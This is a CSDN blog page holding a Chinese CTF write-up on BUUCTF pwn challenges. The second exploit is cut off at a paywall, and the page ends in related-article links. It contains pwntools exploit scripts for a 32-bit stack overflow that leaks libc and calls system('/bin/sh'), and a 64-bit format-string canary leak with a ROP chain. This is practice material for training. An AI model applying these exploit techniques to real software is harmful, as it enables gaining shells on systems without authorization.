BUUCTF pwn水题大赏(三)

最新推荐文章于 2023-12-22 23:12:17 发布
最新推荐文章于 2023-12-22 23:12:17 发布
阅读量383 收藏 2
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45878152/article/details/113617049
版权
本文详细介绍了多个CTF比赛中的漏洞利用技巧,包括32位和64位栈溢出、格式化字符串漏洞、整数溢出、栈迁移等,通过exploit分享了如何泄露信息、修改内存布局以达成目标。
摘要由CSDN通过智能技术生成

BUUCTF pwn水题大赏

铁人三项(第五赛区)_2018_rop

32位栈溢出,利用 write 泄露 libc
exp:

from pwn import*
context.log_level='DEBUG'
p=remote('node3.buuoj.cn',28788)
#p=process('./2018_rop')
libc=ELF('./libc-2.27.so')
elf=ELF('./2018_rop')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload1='a'*0x88+'a'*4+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload1)
write_addr=u32(p.recv(4))
print hex(write_addr)
libc_base=write_addr-libc.sym['write']
sys=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()
print hex(libc_base)

payload2='a'*0x88+'a'*4+p32(sys)+p32(main_addr)+p32(binsh)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()

bjdctf_2020_babyrop

64位栈溢出,利用 puts 泄露 libc
exp:

from pwn import*
from LibcSearcher import*
context.log_level = 'debug'
p=process('./bjdctf_2020_babyrop2')
#p=remote('node3.buuoj.cn',27713)
ret=0x00000000004005f9
pop_rdi=0x0000000000400993
elf=ELF('./bjdctf_2020_babyrop2')

puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
vuln_addr=elf.symbols['vuln']

p.sendline('%7$p')
p.recvuntil('0x')
a=int(p.recv(16),16)
print hex(a)

payload1='a'*0x18+p64(a)+'a'*8+p64(ret)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
p.sendlineafter('story!'
最低0.47元/天 解锁文章
o琦野o
关注
专栏目录
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 440
buuctf-pwn 001-016wp
学习笔记:buuctf pwn
RookieMOR的博客
06-18 493
学习笔记,有不对的请大家指出
持续更新 BUUCTF——PWN
weixin_41748164的博客
03-04 898
这只是个人笔记,buuctf的刷第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
[BackdoorCTF 2023] pwn
weixin_52640415的博客
12-22 697
libc2.35 uaf, 格式化字符串o
CTF pwn 方向部分
kali_Ma的博客
01-12 1382
dataleak 用”\或者/都可以跳过2个\x00,但是每次用”\会拷贝4个字节到buf中,导致最后的3字节数据无法泄露,所以用/\配合垃圾数据填充来控制泄露字符串。 exp: #!python #coding:utf-8 from pwn import * import subprocess, sys, os from time import sleep sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x
warmup pwn入门
02-11
pwn入门
welpwn pwn 入门
02-11
pwn 入门
pwn1 一道pwn练习
05-07
pwn练习
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
CTF buuoj pwn-----第3:warmup_csaw_2016
bing_Max的博客
08-29 1728
CTF buuoj pwn-----第3:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
buuctf--pwn-warmup
weixin_45427676的博客
09-19 527
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
[BUUCTF]PWN——bjdctf_2020_babyrop2
mcmuyanga的博客
11-05 1316
bjdctf_2020_babyrop2 附件 步骤: 例行检查,64位程序,开启了NX和canary保护 2. 试运行一下程序,看看大概的情况 提示我们去泄露libc 3. 64位ida载入,从main函数开始看程序 init gift 第9行的printf函数存在格式化字符串漏洞,可以利用这点去泄露canary的值 vuln buf参数存在溢出漏洞,只要绕过了canary就能够利用ret2libc的方法获取shell 利用思路: 利用格式化字符串泄露出canary的值 利用溢出漏洞,
ctf web小白入门水题分享
weixin_43258754的博客
10-31 7172
最近开始入门web,分享几道入门级的目,以及我的wirteup(本栏目会一直连载) 第一:网址:http://123.206.87.240:8002/web5/ 点开链接后 页面上没有什么特别的,看不到什么线索,所以选择查看源代码 基本上确定了本为JS加密的目,JS加密的目可以直接用浏览器的控制台解密,本人使用谷歌浏览器 输入flag 发现不对!? 目中答案格式CTF是大写,而得...
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 1023
[BUUCTF]3——warmup_csaw_2016 目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
buuctf记录(
pwnyuan's blog
11-18 3338
Brefore 害,还是buu的水题,我太菜了,只能写一分 ┭┮﹏┭┮ Crypto [GUET-CTF2019]BaByRsa 思路:给了p+q,给了(p+1)*(q+1) ,简单的数学解方程,然后就直接基本rsa (p+1) * (q+1) - 1 - (p+q) ==> p * q (p+q)^2 - 4 * p * q ==> (p-q)^2 ==> (p-q) ( (p+q) +(p-q) ) //2 ==> p ==>q exp import gmp
buuctf pwn第三波)学会利用整数溢出
月阴荒的博客
04-04 747
bjdctf_2020_babystack2 https://www.cnblogs.com/bhxdn/p/12331035.html
buuctf pwn wp(第六波)学会绕过Canary保护
月阴荒的博客
04-22 666
canary保护,也被称为金丝雀
BUUCTF-pwn(3)
njh18790816639的博客
11-10 707
[HarekazeCTF2019]baby_rop 该还是比较简单的,没有什么难点!先探测一波保护! 并且还发现了字符串! 然后我们就可以开始构造payload了! payload = b’a’*(0x10+0x8)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) jarvisoj_level2_x64 这道目过于简单,所以就不再分析了,直接上脚本! from pwn import * context(log_level='debug',os='linu
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值